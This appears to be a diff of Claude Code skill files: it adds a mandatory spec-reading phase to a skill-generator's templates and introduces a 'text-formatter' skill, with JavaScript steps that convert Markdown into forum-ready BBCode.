| [phases/02-structure-generation.md](phases/02-structure-generation.md) | 生成目录结构 |
|
||||
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | 生成 Phase 文件 |
|
||||
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | 生成规范和模板 |
|
||||
| [phases/05-validation.md](phases/05-validation.md) | 验证和文档 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置 - 禁止跳过) │
|
||||
│ → Read: ../_shared/SKILL-DESIGN-SPEC.md (通用设计规范) │
|
||||
│ → Read: templates/*.md (所有相关模板文件) │
|
||||
│ → 理解: Skill 结构规范、命名约定、质量标准 │
|
||||
│ → Output: 内化规范要求,确保后续生成符合标准 │
|
||||
│ ⛔ 未完成 Phase 0 禁止进入 Phase 1 │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 1: Requirements Discovery │
|
||||
│ → AskUserQuestion: Skill 名称、目标、执行模式 │
|
||||
│ → Output: skill-config.json │
|
||||
@@ -168,20 +224,3 @@ if (config.execution_mode === 'autonomous') {
|
||||
├── orchestrator-base.md # 编排器模板
|
||||
└── action-base.md # 动作模板
|
||||
```
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | 收集 Skill 需求 |
|
||||
| [phases/02-structure-generation.md](phases/02-structure-generation.md) | 生成目录结构 |
|
||||
| [phases/03-phase-generation.md](phases/03-phase-generation.md) | 生成 Phase 文件 |
|
||||
| [phases/04-specs-templates.md](phases/04-specs-templates.md) | 生成规范和模板 |
|
||||
| [phases/05-validation.md](phases/05-validation.md) | 验证和文档 |
|
||||
| [specs/execution-modes.md](specs/execution-modes.md) | 执行模式规范 |
|
||||
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill 需求规范 |
|
||||
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md 模板 |
|
||||
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential Phase 模板 |
|
||||
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous 编排器模板 |
|
||||
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous Action 模板 |
|
||||
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | 通用设计规范 |
|
||||
|
||||
@@ -2,6 +2,16 @@
|
||||
|
||||
自主模式编排器的模板。
|
||||
|
||||
## ⚠️ 重要提示
|
||||
|
||||
> **Phase 0 是强制前置阶段**:在 Orchestrator 启动执行循环之前,必须先完成 Phase 0 的规范研读。
|
||||
>
|
||||
> 生成 Orchestrator 时,需要确保:
|
||||
> 1. SKILL.md 中已包含 Phase 0 规范研读步骤
|
||||
> 2. Orchestrator 启动前验证规范已阅读
|
||||
> 3. 所有 Action 文件都引用相关的规范文档
|
||||
> 4. Architecture Overview 中 Phase 0 位于 Orchestrator 之前
|
||||
|
||||
## 模板结构
|
||||
|
||||
```markdown
|
||||
|
||||
@@ -2,6 +2,15 @@
|
||||
|
||||
顺序模式 Phase 文件的模板。
|
||||
|
||||
## ⚠️ 重要提示
|
||||
|
||||
> **Phase 0 是强制前置阶段**:在实现任何 Phase (1, 2, 3...) 之前,必须先完成 Phase 0 的规范研读。
|
||||
>
|
||||
> 生成 Sequential Phase 时,需要确保:
|
||||
> 1. SKILL.md 中已包含 Phase 0 规范研读步骤
|
||||
> 2. 每个 Phase 文件都引用相关的规范文档
|
||||
> 3. 执行流程明确标注 Phase 0 为禁止跳过的前置步骤
|
||||
|
||||
## 模板结构
|
||||
|
||||
```markdown
|
||||
|
||||
@@ -36,6 +36,16 @@ allowed-tools: {{allowed_tools}}
|
||||
|
||||
{{design_principles}}
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。未阅读规范直接执行将导致输出不符合质量标准。
|
||||
|
||||
{{mandatory_prerequisites}}
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
{{execution_flow}}
|
||||
@@ -71,9 +81,10 @@ Bash(\`mkdir -p "\${workDir}"\`);
|
||||
| `{{description}}` | string | config.description |
|
||||
| `{{triggers}}` | string | config.triggers.join(", ") |
|
||||
| `{{allowed_tools}}` | string | config.allowed_tools.join(", ") |
|
||||
| `{{architecture_diagram}}` | string | 根据 execution_mode 生成 |
|
||||
| `{{architecture_diagram}}` | string | 根据 execution_mode 生成 (包含 Phase 0) |
|
||||
| `{{design_principles}}` | string | 根据 execution_mode 生成 |
|
||||
| `{{execution_flow}}` | string | 根据 phases/actions 生成 |
|
||||
| `{{mandatory_prerequisites}}` | string | 强制前置阅读文档列表 (specs + templates) |
|
||||
| `{{execution_flow}}` | string | 根据 phases/actions 生成 (Phase 0 在最前) |
|
||||
| `{{output_location}}` | string | config.output.location |
|
||||
| `{{additional_dirs}}` | string | 根据 execution_mode 生成 |
|
||||
| `{{output_structure}}` | string | 根据配置生成 |
|
||||
@@ -84,21 +95,48 @@ Bash(\`mkdir -p "\${workDir}"\`);
|
||||
```javascript
|
||||
/**
 * Render SKILL.md by substituting every {{placeholder}} token in the template.
 *
 * Deduplicated: each placeholder is replaced exactly once — the /g regex
 * already rewrites all occurrences, so the original's repeated
 * {{architecture_diagram}} / {{execution_flow}} replace calls were no-ops
 * that still re-invoked their generator functions.
 *
 * @param {object} config - parsed skill-config.json
 * @returns {string} rendered SKILL.md content
 */
function generateSkillMd(config) {
  const template = Read('templates/skill-md.md');

  return template
    .replace(/\{\{skill_name\}\}/g, config.skill_name)
    .replace(/\{\{display_name\}\}/g, config.display_name)
    .replace(/\{\{description\}\}/g, config.description)
    .replace(/\{\{triggers\}\}/g, config.triggers.map(t => `"${t}"`).join(", "))
    .replace(/\{\{allowed_tools\}\}/g, config.allowed_tools.join(", "))
    .replace(/\{\{architecture_diagram\}\}/g, generateArchitecture(config)) // includes Phase 0
    .replace(/\{\{design_principles\}\}/g, generatePrinciples(config))
    .replace(/\{\{mandatory_prerequisites\}\}/g, generatePrerequisites(config)) // mandatory reading list
    .replace(/\{\{execution_flow\}\}/g, generateFlow(config)) // Phase 0 comes first
    .replace(/\{\{output_location\}\}/g, config.output.location)
    .replace(/\{\{additional_dirs\}\}/g, generateAdditionalDirs(config))
    .replace(/\{\{output_structure\}\}/g, generateOutputStructure(config))
    .replace(/\{\{reference_table\}\}/g, generateReferenceTable(config));
}
|
||||
|
||||
// Build the "Mandatory Prerequisites" markdown tables (specs + templates).
/**
 * @param {{specs?: Array<{path: string, purpose: string}>,
 *          templates?: Array<{path: string, purpose: string}>}} config
 * @returns {string} markdown section; always ends with a trailing newline
 */
function generatePrerequisites(config) {
  const specs = config.specs || [];
  const templates = config.templates || [];

  // Specs table: the first entry is the top-priority (P0) document.
  const lines = [
    '### 规范文档 (必读)',
    '',
    '| Document | Purpose | Priority |',
    '|----------|---------|----------|'
  ];
  specs.forEach((spec, index) => {
    const priority = index === 0 ? '**P0 - 最高**' : 'P1';
    lines.push(`| [${spec.path}](${spec.path}) | ${spec.purpose} | ${priority} |`);
  });

  // Templates table is only emitted when there is at least one template.
  if (templates.length > 0) {
    lines.push('', '### 模板文件 (生成前必读)', '', '| Document | Purpose |', '|----------|---------|');
    for (const tmpl of templates) {
      lines.push(`| [${tmpl.path}](${tmpl.path}) | ${tmpl.purpose} |`);
    }
  }

  return lines.join('\n') + '\n';
}
||||
```
|
||||
|
||||
## Sequential 模式示例
|
||||
@@ -118,6 +156,9 @@ Generate API documentation from source code.
|
||||
|
||||
\`\`\`
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification → 阅读并理解设计规范 (强制前置) │
|
||||
│ Study │
|
||||
│ ↓ │
|
||||
│ Phase 1: Scanning → endpoints.json │
|
||||
│ ↓ │
|
||||
│ Phase 2: Parsing → schemas.json │
|
||||
@@ -125,6 +166,22 @@ Generate API documentation from source code.
|
||||
│ Phase 3: Generation → api-docs.md │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
\`\`\`
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/api-standards.md](specs/api-standards.md) | API 文档标准规范 | **P0 - 最高** |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/endpoint-doc.md](templates/endpoint-doc.md) | 端点文档模板 |
|
||||
```
|
||||
|
||||
## Autonomous 模式示例
|
||||
@@ -144,6 +201,10 @@ Interactive task management with CRUD operations.
|
||||
|
||||
\`\`\`
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置) │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator (状态驱动决策) │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
│
|
||||
@@ -153,4 +214,22 @@ Interactive task management with CRUD operations.
|
||||
│ List │ │Create │ │ Edit │ │Delete │
|
||||
└───────┘ └───────┘ └───────┘ └───────┘
|
||||
\`\`\`
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/task-schema.md](specs/task-schema.md) | 任务数据结构规范 | **P0 - 最高** |
|
||||
| [specs/action-catalog.md](specs/action-catalog.md) | 动作目录 | P1 |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/orchestrator-base.md](templates/orchestrator-base.md) | 编排器模板 |
|
||||
| [templates/action-base.md](templates/action-base.md) | 动作模板 |
|
||||
```
|
||||
|
||||
196
.claude/skills/text-formatter/SKILL.md
Normal file
@@ -0,0 +1,196 @@
|
||||
---
|
||||
name: text-formatter
|
||||
description: Transform and optimize text content with intelligent formatting. Output BBCode + Markdown hybrid format optimized for forums. Triggers on "format text", "text formatter", "排版", "格式化文本", "BBCode".
|
||||
allowed-tools: Task, AskUserQuestion, Read, Write, Bash, Glob
|
||||
---
|
||||
|
||||
# Text Formatter
|
||||
|
||||
Transform and optimize text content with intelligent structure analysis. Output format: **BBCode + Markdown hybrid** optimized for forum publishing.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Text Formatter Architecture (BBCode + MD Mode) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Input Collection → 接收文本/文件 │
|
||||
│ ↓ │
|
||||
│ Phase 2: Content Analysis → 分析结构、识别 Callout/Admonition │
|
||||
│ ↓ │
|
||||
│ Phase 3: Format Transform → 转换为 BBCode+MD 格式 │
|
||||
│ ↓ │
|
||||
│ Phase 4: Output & Preview → 保存文件 + 预览 │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Key Design Principles
|
||||
|
||||
1. **Single Format Output**: BBCode + Markdown hybrid (forum optimized)
|
||||
2. **Pixel-Based Sizing**: size=150/120/100/80 (not 1-7 levels)
|
||||
3. **Forum Compatibility**: Only use widely-supported BBCode tags
|
||||
4. **Markdown Separators**: Use `---` for horizontal rules (not `[hr]`)
|
||||
5. **No Alignment Tags**: `[align]` not supported, avoid usage
|
||||
|
||||
---
|
||||
|
||||
## Format Specification
|
||||
|
||||
### Supported BBCode Tags
|
||||
|
||||
| Tag | Usage | Example |
|
||||
|-----|-------|---------|
|
||||
| `[size=N]` | Font size (pixels) | `[size=120]Title[/size]` |
|
||||
| `[color=X]` | Text color (hex/name) | `[color=#2196F3]Blue[/color]` 或 `[color=blue]` |
|
||||
| `[b]` | Bold | `[b]Bold text[/b]` |
|
||||
| `[i]` | Italic | `[i]Italic[/i]` |
|
||||
| `[s]` | Strikethrough | `[s]deleted[/s]` |
|
||||
| `[u]` | Underline | `[u]underlined[/u]` |
|
||||
| `[quote]` | Quote block | `[quote]Content[/quote]` |
|
||||
| `[code]` | Code block | `[code]code[/code]` |
|
||||
| `[img]` | Image | `[img]url[/img]` |
|
||||
| `[url]` | Link | `[url=link]text[/url]` |
|
||||
| `[list]` | List container | `[list][*]item[/list]` |
|
||||
| `[spoiler]` | Collapsible content | `[spoiler=标题]隐藏内容[/spoiler]` |
|
||||
|
||||
### HTML to BBCode Conversion
|
||||
|
||||
| HTML Input | BBCode Output |
|
||||
|------------|---------------|
|
||||
| `<mark>高亮</mark>` | `[color=yellow]高亮[/color]` |
|
||||
| `<u>下划线</u>` | `[u]下划线[/u]` |
|
||||
| `<details><summary>标题</summary>内容</details>` | `[spoiler=标题]内容[/spoiler]` |
|
||||
|
||||
### Unsupported Tags (Avoid!)
|
||||
|
||||
| Tag | Reason | Alternative |
|
||||
|-----|--------|-------------|
|
||||
| `[align]` | Not rendered | Remove or use default left |
|
||||
| `[hr]` | Shows as text | Use Markdown `---` |
|
||||
| `<div>` | HTML not supported | Use BBCode only |
|
||||
| `[table]` | Limited support | Use list or code block |
|
||||
|
||||
### Size Hierarchy (Pixels)
|
||||
|
||||
| Element | Size | Color | Usage |
|
||||
|---------|------|-------|-------|
|
||||
| **Main Title** | 150 | #2196F3 | Document title |
|
||||
| **Section Title** | 120 | #2196F3 | Major sections (## H2) |
|
||||
| **Subsection** | 100 | #333 | Sub-sections (### H3) |
|
||||
| **Normal Text** | (default) | - | Body content |
|
||||
| **Notes/Gray** | 80 | gray | Footnotes, metadata |
|
||||
|
||||
### Color Palette
|
||||
|
||||
| Color | Hex | Semantic Usage |
|
||||
|-------|-----|----------------|
|
||||
| **Blue** | #2196F3 | Titles, links, info |
|
||||
| **Green** | #4CAF50 | Success, tips, features |
|
||||
| **Orange** | #FF9800 | Warnings, caution |
|
||||
| **Red** | #F44336 | Errors, danger, important |
|
||||
| **Purple** | #9C27B0 | Examples, code |
|
||||
| **Gray** | gray | Notes, metadata |
|
||||
|
||||
---
|
||||
|
||||
## Mandatory Prerequisites
|
||||
|
||||
> Read before execution:
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/format-rules.md](specs/format-rules.md) | Format conversion rules | **P0** |
|
||||
| [specs/element-mapping.md](specs/element-mapping.md) | Element type mappings | P1 |
|
||||
| [specs/callout-types.md](specs/callout-types.md) | Callout/Admonition types | P1 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 1: Input Collection │
|
||||
│ - Ask: paste text OR file path │
|
||||
│ - Output: input-config.json │
|
||||
├────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 2: Content Analysis │
|
||||
│ - Detect structure: headings, lists, code blocks, tables │
|
||||
│ - Identify Callouts/Admonitions (>[!type]) │
|
||||
│ - Output: analysis.json │
|
||||
├────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 3: Format Transform │
|
||||
│ - Apply BBCode + MD rules from specs/format-rules.md │
|
||||
│ - Convert elements with pixel-based sizes │
|
||||
│ - Use Markdown --- for separators │
|
||||
│ - Output: formatted content │
|
||||
├────────────────────────────────────────────────────────────────┤
|
||||
│ Phase 4: Output & Preview │
|
||||
│ - Save to .bbcode.txt file │
|
||||
│ - Display preview │
|
||||
│ - Output: final file │
|
||||
└────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Callout/Admonition Support
|
||||
|
||||
支持 Obsidian 风格的 Callout 语法,转换为 BBCode quote:
|
||||
|
||||
```markdown
|
||||
> [!NOTE]
|
||||
> 这是一个提示信息
|
||||
|
||||
> [!WARNING]
|
||||
> 这是一个警告信息
|
||||
```
|
||||
|
||||
转换结果:
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#2196F3][b]📝 注意[/b][/color][/size]
|
||||
|
||||
这是一个提示信息
|
||||
[/quote]
|
||||
```
|
||||
|
||||
| Type | Color | Icon |
|
||||
|------|-------|------|
|
||||
| NOTE/INFO | #2196F3 | 📝 |
|
||||
| TIP/HINT | #4CAF50 | 💡 |
|
||||
| SUCCESS | #4CAF50 | ✅ |
|
||||
| WARNING/CAUTION | #FF9800 | ⚠️ |
|
||||
| DANGER/ERROR | #F44336 | ❌ |
|
||||
| EXAMPLE | #9C27B0 | 📋 |
|
||||
|
||||
## Directory Setup
|
||||
|
||||
```javascript
|
||||
const timestamp = new Date().toISOString().slice(0,10).replace(/-/g, '');
|
||||
const workDir = `.workflow/.scratchpad/text-formatter-${timestamp}`;
|
||||
|
||||
Bash(`mkdir -p "${workDir}"`);
|
||||
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
|
||||
.workflow/.scratchpad/text-formatter-{date}/
|
||||
├── input-config.json # 输入配置
|
||||
├── analysis.json # 内容分析结果
|
||||
└── output.bbcode.txt # BBCode+MD 输出
|
||||
```
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/01-input-collection.md](phases/01-input-collection.md) | 收集输入内容 |
|
||||
| [phases/02-content-analysis.md](phases/02-content-analysis.md) | 分析内容结构 |
|
||||
| [phases/03-format-transform.md](phases/03-format-transform.md) | 格式转换 |
|
||||
| [phases/04-output-preview.md](phases/04-output-preview.md) | 输出和预览 |
|
||||
| [specs/format-rules.md](specs/format-rules.md) | 格式转换规则 |
|
||||
| [specs/element-mapping.md](specs/element-mapping.md) | 元素映射表 |
|
||||
| [specs/callout-types.md](specs/callout-types.md) | Callout 类型定义 |
|
||||
| [templates/bbcode-template.md](templates/bbcode-template.md) | BBCode 模板 |
|
||||
111
.claude/skills/text-formatter/phases/01-input-collection.md
Normal file
@@ -0,0 +1,111 @@
|
||||
# Phase 1: Input Collection
|
||||
|
||||
收集用户输入的文本内容。
|
||||
|
||||
## Objective
|
||||
|
||||
- 获取用户输入内容(直接粘贴或文件路径)
|
||||
- 生成输入配置文件
|
||||
|
||||
**注意**: 输出格式固定为 BBCode + Markdown 混合格式(论坛优化),无需选择。
|
||||
|
||||
## Input
|
||||
|
||||
- 来源: 用户交互
|
||||
- 配置: 无前置依赖
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 询问输入方式
|
||||
|
||||
```javascript
|
||||
const inputMethod = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "请选择输入方式",
|
||||
header: "输入方式",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "直接粘贴文本", description: "在对话中粘贴要格式化的内容" },
|
||||
{ label: "指定文件路径", description: "读取指定文件的内容" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
```
|
||||
|
||||
### Step 2: 获取内容
|
||||
|
||||
```javascript
|
||||
let content = '';
|
||||
|
||||
if (inputMethod["输入方式"] === "直接粘贴文本") {
|
||||
// 提示用户粘贴内容
|
||||
const textInput = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "请粘贴要格式化的文本内容(粘贴后选择确认)",
|
||||
header: "文本内容",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "已粘贴完成", description: "确认已在上方粘贴内容" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
// 从用户消息中提取文本内容
|
||||
content = extractUserText();
|
||||
} else {
|
||||
// 询问文件路径
|
||||
const filePath = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "请输入文件路径",
|
||||
header: "文件路径",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "已输入路径", description: "确认路径已在上方输入" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
content = Read(extractedFilePath);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3: 保存配置
|
||||
|
||||
```javascript
|
||||
const config = {
|
||||
input_method: inputMethod["输入方式"],
|
||||
target_format: "BBCode+MD", // 固定格式
|
||||
original_content: content,
|
||||
timestamp: new Date().toISOString()
|
||||
};
|
||||
|
||||
Write(`${workDir}/input-config.json`, JSON.stringify(config, null, 2));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `input-config.json`
|
||||
- **Format**: JSON
|
||||
|
||||
```json
|
||||
{
|
||||
"input_method": "直接粘贴文本",
|
||||
"target_format": "BBCode+MD",
|
||||
"original_content": "...",
|
||||
"timestamp": "2026-01-13T..."
|
||||
}
|
||||
```
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 成功获取用户输入内容
|
||||
- [ ] 内容非空且有效
|
||||
- [ ] 配置文件已保存
|
||||
|
||||
## Next Phase
|
||||
|
||||
→ [Phase 2: Content Analysis](02-content-analysis.md)
|
||||
248
.claude/skills/text-formatter/phases/02-content-analysis.md
Normal file
@@ -0,0 +1,248 @@
|
||||
# Phase 2: Content Analysis
|
||||
|
||||
分析输入内容的结构和语义元素。
|
||||
|
||||
## Objective
|
||||
|
||||
- 识别内容结构(标题、段落、列表等)
|
||||
- 检测特殊元素(代码块、表格、链接等)
|
||||
- 生成结构化分析结果
|
||||
|
||||
## Input
|
||||
|
||||
- 依赖: `input-config.json`
|
||||
- 配置: `{workDir}/input-config.json`
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 加载输入
|
||||
|
||||
```javascript
|
||||
const config = JSON.parse(Read(`${workDir}/input-config.json`));
|
||||
const content = config.original_content;
|
||||
```
|
||||
|
||||
### Step 2: 结构分析
|
||||
|
||||
```javascript
|
||||
/**
 * Scan markdown-ish text line by line and build a structural inventory.
 *
 * Recognized: fenced code blocks, ATX headings, (un)ordered lists,
 * Obsidian-style callouts ("> [!TYPE]"), plain quotes, table rows,
 * inline links/images, and paragraphs.
 *
 * @param {string} text - raw input content
 * @returns {{elements: Array<object>, stats: object}} element list plus counters
 */
function analyzeStructure(text) {
  const analysis = {
    elements: [],
    stats: {
      headings: 0,
      paragraphs: 0,
      lists: 0,
      code_blocks: 0,
      tables: 0,
      links: 0,
      images: 0,
      quotes: 0,
      callouts: 0
    }
  };

  // Obsidian-style callout header: "> [!TYPE]" with an optional title.
  const CALLOUT_PATTERN = /^>\s*\[!(\w+)\](?:\s+(.+))?$/;

  const lines = text.split('\n');
  let inCodeBlock = false;
  let inList = false;
  // FIX: track contiguous table runs so each table is counted once.
  // The original guard looked for an element of type 'table', which is never
  // pushed (rows are 'table_row'), so stats.tables incremented once PER ROW.
  let inTable = false;

  for (let i = 0; i < lines.length; i++) {
    const line = lines[i];

    // A fence line toggles code-block state; only the opening fence records an element.
    if (line.match(/^```/)) {
      inCodeBlock = !inCodeBlock;
      if (inCodeBlock) {
        analysis.elements.push({
          type: 'code_block',
          start: i,
          language: line.replace(/^```/, '').trim()
        });
        analysis.stats.code_blocks++;
      }
      continue;
    }

    // Everything inside a fence is opaque; skip structural checks.
    if (inCodeBlock) continue;

    // Any non-table line terminates the current table run.
    if (!line.match(/^\|.*\|$/)) {
      inTable = false;
    }

    // ATX headings (# through ######, followed by whitespace).
    if (line.match(/^#{1,6}\s/)) {
      const level = line.match(/^(#+)/)[1].length;
      analysis.elements.push({
        type: 'heading',
        level: level,
        content: line.replace(/^#+\s*/, ''),
        line: i
      });
      analysis.stats.headings++;
      continue;
    }

    // List items; only the first item of a run records a 'list' element.
    if (line.match(/^[\s]*[-*+]\s/) || line.match(/^[\s]*\d+\.\s/)) {
      if (!inList) {
        analysis.elements.push({
          type: 'list',
          start: i,
          // FIX: allow leading whitespace, consistent with the detection
          // regex above (the original /^\d+\./ misclassified indented
          // ordered lists as unordered).
          ordered: line.match(/^\s*\d+\./) !== null
        });
        analysis.stats.lists++;
        inList = true;
      }
      continue;
    } else {
      inList = false;
    }

    // Callouts take precedence over plain quotes; consume the whole "> ..." run.
    const calloutMatch = line.match(CALLOUT_PATTERN);
    if (calloutMatch) {
      const calloutType = calloutMatch[1].toLowerCase();
      const calloutTitle = calloutMatch[2] || null;
      const calloutContent = [];
      let j = i + 1;
      while (j < lines.length && lines[j].startsWith('>')) {
        calloutContent.push(lines[j].replace(/^>\s*/, ''));
        j++;
      }
      analysis.elements.push({
        type: 'callout',
        calloutType: calloutType,
        title: calloutTitle,
        content: calloutContent.join('\n'),
        start: i,
        end: j - 1
      });
      analysis.stats.callouts++;
      i = j - 1; // skip the lines already consumed by the callout body
      continue;
    }

    // Plain single-line quote.
    if (line.match(/^>\s/)) {
      analysis.elements.push({
        type: 'quote',
        content: line.replace(/^>\s*/, ''),
        line: i
      });
      analysis.stats.quotes++;
      continue;
    }

    // Table rows; count the table once at the start of each contiguous run.
    if (line.match(/^\|.*\|$/)) {
      analysis.elements.push({
        type: 'table_row',
        line: i
      });
      if (!inTable) {
        analysis.stats.tables++;
        inTable = true;
      }
      continue;
    }

    // Inline links / images are only tallied, not recorded as elements.
    const links = line.match(/\[([^\]]+)\]\(([^)]+)\)/g);
    if (links) {
      analysis.stats.links += links.length;
    }

    const images = line.match(/!\[([^\]]*)\]\(([^)]+)\)/g);
    if (images) {
      analysis.stats.images += images.length;
    }

    // Any remaining non-blank line that is not a ---/=== rule is a paragraph.
    if (line.trim() && !line.match(/^[-=]{3,}$/)) {
      analysis.elements.push({
        type: 'paragraph',
        line: i,
        preview: line.substring(0, 50)
      });
      analysis.stats.paragraphs++;
    }
  }

  return analysis;
}
|
||||
|
||||
const analysis = analyzeStructure(content);
|
||||
```
|
||||
|
||||
### Step 3: 语义增强
|
||||
|
||||
```javascript
|
||||
// 识别特殊语义
|
||||
/**
 * Extend a structural analysis with lightweight semantic metrics:
 * emphasis (bold/italic marker) counts and an estimated reading time.
 *
 * NOTE(review): the italic regex also matches inside bold runs, so the
 * italic count can exceed the number of true *italic* spans; preserved
 * as-is. Reading time splits on whitespace (~200 words/min) — presumably
 * inaccurate for CJK text; verify against callers.
 *
 * @param {string} text - original input content
 * @param {object} analysis - result of analyzeStructure
 * @returns {object} shallow copy of analysis with a `semantics` field added
 */
function enhanceSemantics(text, analysis) {
  const countMatches = (pattern) => (text.match(pattern) || []).length;
  const wordCount = text.split(/\s+/).length;

  return {
    ...analysis,
    semantics: {
      emphasis: {
        bold: countMatches(/\*\*[^*]+\*\*/g),
        italic: countMatches(/\*[^*]+\*/g)
      },
      estimated_reading_time: Math.ceil(wordCount / 200) // 200 words/min
    }
  };
}
|
||||
|
||||
const enhancedAnalysis = enhanceSemantics(content, analysis);
|
||||
```
|
||||
|
||||
### Step 4: 保存分析结果
|
||||
|
||||
```javascript
|
||||
Write(`${workDir}/analysis.json`, JSON.stringify(enhancedAnalysis, null, 2));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `analysis.json`
|
||||
- **Format**: JSON
|
||||
|
||||
```json
|
||||
{
|
||||
"elements": [
|
||||
{ "type": "heading", "level": 1, "content": "Title", "line": 0 },
|
||||
{ "type": "paragraph", "line": 2, "preview": "..." },
|
||||
{ "type": "callout", "calloutType": "warning", "title": "注意事项", "content": "...", "start": 4, "end": 6 },
|
||||
{ "type": "code_block", "start": 8, "language": "javascript" }
|
||||
],
|
||||
"stats": {
|
||||
"headings": 3,
|
||||
"paragraphs": 10,
|
||||
"lists": 2,
|
||||
"code_blocks": 1,
|
||||
"tables": 0,
|
||||
"links": 5,
|
||||
"images": 0,
|
||||
"quotes": 1,
|
||||
"callouts": 2
|
||||
},
|
||||
"semantics": {
|
||||
"emphasis": { "bold": 5, "italic": 3 },
|
||||
"estimated_reading_time": 2
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 所有结构元素已识别
|
||||
- [ ] 统计信息准确
|
||||
- [ ] 语义增强完成
|
||||
- [ ] 分析文件已保存
|
||||
|
||||
## Next Phase
|
||||
|
||||
→ [Phase 3: Format Transform](03-format-transform.md)
|
||||
245
.claude/skills/text-formatter/phases/03-format-transform.md
Normal file
@@ -0,0 +1,245 @@
|
||||
# Phase 3: Format Transform
|
||||
|
||||
将内容转换为 BBCode + Markdown 混合格式(论坛优化)。
|
||||
|
||||
## Objective
|
||||
|
||||
- 根据分析结果转换内容
|
||||
- 应用像素级字号规则
|
||||
- 处理 Callout/标注语法
|
||||
- 生成论坛兼容的输出
|
||||
|
||||
## Input
|
||||
|
||||
- 依赖: `input-config.json`, `analysis.json`
|
||||
- 规范: `specs/format-rules.md`, `specs/element-mapping.md`
|
||||
|
||||
## Format Specification
|
||||
|
||||
### Size Hierarchy (Pixels)
|
||||
|
||||
| Element | Size | Color | Usage |
|
||||
|---------|------|-------|-------|
|
||||
| **H1** | 150 | #2196F3 | 文档主标题 |
|
||||
| **H2** | 120 | #2196F3 | 章节标题 |
|
||||
| **H3** | 100 | #333 | 子标题 |
|
||||
| **H4+** | (默认) | - | 仅加粗 |
|
||||
| **Notes** | 80 | gray | 备注/元数据 |
|
||||
|
||||
### Unsupported Tags (禁止使用)
|
||||
|
||||
| Tag | Reason | Alternative |
|
||||
|-----|--------|-------------|
|
||||
| `[align]` | 不渲染 | 删除,使用默认左对齐 |
|
||||
